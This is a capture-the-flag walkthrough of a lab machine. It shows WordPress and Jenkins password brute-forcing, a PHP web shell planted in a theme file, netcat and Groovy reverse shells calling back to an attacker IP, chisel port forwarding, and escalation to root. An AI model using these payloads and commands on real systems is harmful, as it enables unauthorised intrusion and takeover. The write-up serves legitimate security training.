Enumeration


IP: 10.10.25.58 Host: internal.thm


Let’s start with the nmap full port scan and see the open ports

Nmap full port scan

┌──(root💀b0x)-[/mnt/hgfs/THM/Internal]                                                                                                                                                                     [7/117]
└─# nmap -p- -v -iL ip -oN nmapFullPort.nmap                                                                                                                                                                       
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-07 13:15 PKT                                          
Initiating Ping Scan at 13:15                       
Scanning 10.10.25.58 [4 ports]                                                                           
Completed Ping Scan at 13:15, 0.22s elapsed (1 total hosts)                                              
Initiating SYN Stealth Scan at 13:15                
Scanning internal.thm (10.10.25.58) [65535 ports]                                                        
Discovered open port 80/tcp on 10.10.25.58          
Discovered open port 22/tcp on 10.10.25.58         
SYN Stealth Scan Timing: About 96.47% done; ETC: 13:34 (0:00:40 remaining)                               
Completed SYN Stealth Scan at 13:35, 1181.13s elapsed (65535 total ports)                                
Nmap scan report for internal.thm (10.10.25.58)                                                          
Host is up (0.19s latency).                         
Not shown: 65533 closed ports                       
PORT   STATE SERVICE                                
22/tcp open  ssh                                    
80/tcp open  http                                   

Read data files from: /usr/bin/../share/nmap        
Nmap done: 1 IP address (1 host up) scanned in 1181.51 seconds                                           
           Raw packets sent: 74888 (3.295MB) | Rcvd: 110353 (9.720MB)                                    

Enumerating HTTP Web Server (Port 80)

Taking a look at port 80, we can see that / points to Apache’s default page. Let’s try running gobuster against the web server:

┌──(root💀b0x)-[/mnt/hgfs/THM/Internal]                                                                                                                                                                            
└─# gobuster dir -u http://10.10.245.7 -w /usr/share/wordlists/dirb/big.txt -k -e -b 404 -t 100                                                                                       1 ⨯                          
===============================================================                                                                                                                                                    
Gobuster v3.1.0                                                                                                                                                                                                    
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)                                                                                                                                                      
===============================================================                                                                                                                                                    
[+] Url:                     http://10.10.245.7                                                                                                                                                                    
[+] Method:                  GET                                                                                                                                                                                   
[+] Threads:                 100                                                                                                                                                                                   [+] Wordlist:                /usr/share/wordlists/dirb/big.txt                                                                                                                                                     [+] Negative Status codes:   404                                                                                                                                                                                   
[+] User Agent:              gobuster/3.1.0                                                                                                                                                                        
[+] Expanded:                true                                                                                                                                                                                  
[+] Timeout:                 10s                                                                                                                                                                                   
===============================================================                                                                                                                                                    
2021/04/07 13:05:27 Starting gobuster in directory enumeration mode                                                                                                                                                
===============================================================                                                                                                                                                    
http://10.10.245.7/.htpasswd            (Status: 403) [Size: 276]                                                                                                                                                  
http://10.10.245.7/.htaccess            (Status: 403) [Size: 276]                                                                                                                                                  
http://10.10.245.7/blog                 (Status: 301) [Size: 309] [--> http://10.10.245.7/blog/]                                                                                                                   
http://10.10.245.7/javascript           (Status: 301) [Size: 315] [--> http://10.10.245.7/javascript/]                                                                                                             
http://10.10.245.7/phpmyadmin           (Status: 301) [Size: 315] [--> http://10.10.245.7/phpmyadmin/]                                                                                                             
http://10.10.245.7/server-status        (Status: 403) [Size: 276]                                                                                                                                                  
http://10.10.245.7/wordpress            (Status: 301) [Size: 314] [--> http://10.10.245.7/wordpress/]                                                                                                              
                                                                                                                                                                                                                   
===============================================================                                                                                                                                                    
2021/04/07 13:06:13 Finished                                                                                                                                                                                       
===============================================================                                                                                                                                                    

Visiting /blog/ we can find that it’s hosting wordpress. Let’s run wpscan and see what we can enumerate.

WpScan (/blog/)

┌──(root💀b0x)-[/mnt/hgfs/THM/Internal]                                                                  
└─# wpscan --url http://internal.thm/blog/ -e u   
_______________________________________________________________                                      
         __          _______   _____                                                                                                                                                                               
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.17
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://internal.thm/blog/ [10.10.25.58]
[+] Started: Wed Apr  7 14:17:35 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu) 
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://internal.thm/blog/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://internal.thm/blog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://internal.thm/blog/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
 |  - http://internal.thm/blog/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://internal.thm/blog/wp-content/themes/twentyseventeen/
 | Last Updated: 2021-03-09T00:00:00.000Z
 | Readme: http://internal.thm/blog/wp-content/themes/twentyseventeen/readme.txt
 | [!] The version is out of date, the latest version is 2.6
 | Style URL: http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=====================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://internal.thm/blog/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Apr  7 14:17:39 2021
[+] Requests Done: 13
[+] Cached Requests: 48
[+] Data Sent: 3.457 KB
[+] Data Received: 9.149 KB
[+] Memory used: 167 MB
[+] Elapsed time: 00:00:03

We can see that admin user exists in the application. Let’s use rockyou.txt wordlist for bruteforcing.

┌──(root💀b0x)-[/mnt/hgfs/THM/Internal]                                                                                                                                                                   [475/528]
└─# wpscan --url http://internal.thm/blog/ -v -e u -P /usr/share/wordlists/rockyou.txt -t 500                                                                                                                  2 ⨯
_______________________________________________________________                                          
         __          _______   _____                                                                                                                                                                               
         \ \        / /  __ \ / ____|                                                                                                                                                                              
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®                                                   
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \                                                    
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.17
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://internal.thm/blog/ [10.10.25.58]
[+] Started: Wed Apr  7 14:09:25 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu) 
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://internal.thm/blog/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://internal.thm/blog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://internal.thm/blog/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>                                                                                                     [426/528]
 |  - http://internal.thm/blog/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://internal.thm/blog/wp-content/themes/twentyseventeen/
 | Last Updated: 2021-03-09T00:00:00.000Z
 | Readme: http://internal.thm/blog/wp-content/themes/twentyseventeen/readme.txt
 | [!] The version is out of date, the latest version is 2.6
 | Style URL: http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a focus on business sites, it features multiple sections on the front page as well as widgets, navi
gation and social menus, a logo, and more. Personalize its asymmetrical grid with a custom color scheme and showcase your multimedia content with post formats. Our default theme for 2017 works great in many lang
uages, for any abilities, and on any device.
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 | License: GNU General Public License v2 or later
 | License URI: http://www.gnu.org/licenses/gpl-2.0.html
 | Tags: one-column, two-columns, right-sidebar, flexible-header, accessibility-ready, custom-colors, custom-header, custom-menu, custom-logo, editor-style, featured-images, footer-widgets, post-formats, rtl-lan
guage-support, sticky-post, theme-options, threaded-comments, translation-ready
 | Text Domain: twentyseventeen
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:04 <=====================================================================================================================================> (10 / 10) 100.00% Time: 00:00:04

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://internal.thm/blog/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - admin / ...                                                                              
Trying admin / timmy1 Time: 00:01:35 <                                                                                                                                    > (4000 / 14348392)  0.02%  ETA: ??:??:??
                                                                                                         
[!] Valid Combinations Found:                                                                            
 | Username: admin, Password: ...                                                                    
                                                                                                         
[!] No WPScan API Token given, as a result vulnerability data has not been output.                       
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register    
                                                                                                         
[+] Finished: Wed Apr  7 14:11:21 2021                                                                   
[+] Requests Done: 4056                                                                                  
[+] Cached Requests: 7                                                                                   
[+] Data Sent: 2.022 MB                                                                                  
[+] Data Received: 2.759 MB                                                                              
[+] Memory used: 186.539 MB                                                                              
[+] Elapsed time: 00:01:55                                                                               

Got hit around 4000 tries, we get credentials of the user admin

admin:...


Exploitation

Let’s now try and login and get reverse shell on our machine. I’ll be editing the theme file (404.php) and add the following for rce:

<?php
	
system($_GET[123]);

?>

Added the snippet for getting RCE

Now, we need to visit a 404 page on the application to get RCE! We do so by finding a legit blog post and just changing the URL.

RCE

Reverse Shell time!

Alright, time to get reverse shell, let’s see if we’ve nc on the host. Can do so by using which

which nc

Alright, nc exists. We can utilize the following to get reverse shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.17.0.120 4444 >/tmp/f

Let’s URL encode it before using, since due to & the payload might not execute. We can use cyberchef for doing so.

Remember to encode all special characters as well!

rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20%2Di%202%3E%261%7Cnc%2010%2E17%2E0%2E120%204444%20%3E%2Ftmp%2Ff

Let’s get RCE now, first start listener on local 4444 port.

http://internal.thm/blog/index.php/2020/08/04/hello-world/?123=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20%2Di%202%3E%261%7Cnc%2010%2E17%2E0%2E120%204444%20%3E%2Ftmp%2Ff

Got reverse shell! Beautified and made it interactive as well.


Privileges Escalation

Alright, we got shell as www-data user and can’t really find any flags. Also, there’s a user in /home/aubreanna

Looking at the processes we can see that it has one java service running:

[email protected]al:/var/www/html/wordpress$ ps aux | grep aubrean
aubrean+  1540  0.0  0.0   1148     4 ?        Ss   09:07   0:00 /sbin/tini -- /usr/local/bin/jenkins.sh
aubrean+  1574  1.7 12.0 2587808 245668 ?      Sl   09:07   0:23 java -Duser.home=/var/jenkins_home -Djenkins.model.Jenkins.slaveAgentPort=50000 -jar /usr/share/jenkins/jenkins.war
aubrean+  1612  0.0  0.0      0     0 ?        Z    09:07   0:00 [jenkins.sh] <defunct>
www-data  5586  0.0  0.0  11464  1100 pts/0    S+   09:29   0:00 grep --color=auto aubrean

Let’s see the local listening ports:

[email protected]:/var/www/html/wordpress$ netstat -plnt
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:33897         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   

Port 8080 is listening locally, let’s try and cURL and see the repsonse it.

[email protected]:/var/www/html/wordpress$ curl -i http://127.0.0.1:8080
HTTP/1.1 403 Forbidden
Date: Wed, 07 Apr 2021 09:30:54 GMT
X-Content-Type-Options: nosniff
Set-Cookie: JSESSIONID.992b29b3=node01ii80j993afao35bpvwstyvpu0.node0; Path=/; HttpOnly
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=utf-8
X-Hudson: 1.395
X-Jenkins: 2.250
X-Jenkins-Session: 56d53c37
X-Hudson-CLI-Port: 50000
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000
X-You-Are-Authenticated-As: anonymous
X-You-Are-In-Group-Disabled: JENKINS-39402: use -Dhudson.security.AccessDeniedException2.REPORT_GROUP_HEADERS=true or use /whoAmI to diagnose
X-Required-Permission: hudson.model.Hudson.Read
X-Permission-Implied-By: hudson.security.Permission.GenericRead
X-Permission-Implied-By: hudson.model.Hudson.Administer
Content-Length: 793
Server: Jetty(9.4.30.v20200611)

<html><head><meta http-equiv='refresh' content='1;url=/login?from=%2F'/><script>window.location.replace('/login?from=%2F');</script></head><body style='background-color:white; color:white;'>


Authentication required
<!--
You are authenticated as: anonymous
Groups that you are in:
  
Permission you need to have (but didn't): hudson.model.Hudson.Read
 ... which is implied by: hudson.security.Permission.GenericRead
 ... which is implied by: hudson.model.Hudson.Administer
-->

</body></html>    

Port Forwarding (8080)

Interesting, let’s try and do port forwarding utilziing chisel and access the port locally on our own attacker machine.

We can do so by doing the following on attacker/victim machines:

Victim:

[email protected]:/tmp$ ./chisel-umar0x01 server -p 47000 
2021/04/07 09:34:08 server: Fingerprint auG3MXyqO68Dyisj38bk+g/QRvnlc/xVxcjh/ulpye4=
2021/04/07 09:34:08 server: Listening on http://0.0.0.0:47000

Attacker:

┌──(root💀b0x)-[/var/www/html]
└─# ./chisel-umar0x01 client 10.10.25.58:47000 2222:127.0.0.1:8080                                                                                                                                           127 
2021/04/07 14:35:23 client: Connecting to ws://10.10.25.58:47000
2021/04/07 14:35:23 client: tun: proxy#2222=>8080: Listening
2021/04/07 14:35:24 client: Connected (Latency 187.684044ms)

We got the connection:

Now, let’s connect to the localhost port 2222 and see if we can access the forwarded port.

Alright, the port was hosting jenkins!

Again the login form! :|

Let’s run hydra for jenkins bruteforcing!

┌──(root💀b0x)-[/mnt/hgfs/THM/Internal]
└─# hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 2222 http-post-form '/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:F=Invalid' -I                   130 
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-07 15:05:14
[INFO] Using HTTP Proxy: http://127.0.0.1:8080
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://127.0.0.1:2222/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:F=Invalid

[2222][http-post-form] host: 127.0.0.1   login: admin   password: ...
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-07 15:05:40

http://127.0.0.1:2222/script

admin:...

Getting code execution on Jenkins, we know that it supports groovy script execution.

def command = "cat /etc/passwd"
def proc = command.execute()
proc.waitFor()
println "Std Out: ${proc.in.text}"

The above doesn’t work due to some reason for reverse shell. We can use the following snippet from this gist.

String host="10.17.0.120";
int port=4444;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Got shell!


Enumerating the container found /opt/note.txt. It contained the following:

[email protected]:/opt$ cat note.txt
cat note.txt
Aubreanna,

Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here.  Use them if you 
need access to the root user account.

root:...

Getting root!

Now, let’s try the following credentials as the root user.

[email protected]:/tmp$ su - root
Password: 
[email protected]:~# 
[email protected]:~# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:~# head /etc/shadow
root:...:18477:0:99999:7:::
daemon:*:18295:0:99999:7:::

r00t! This machine was purely based on enumeration. Hopefully, you enjoyed reading the walkthrough!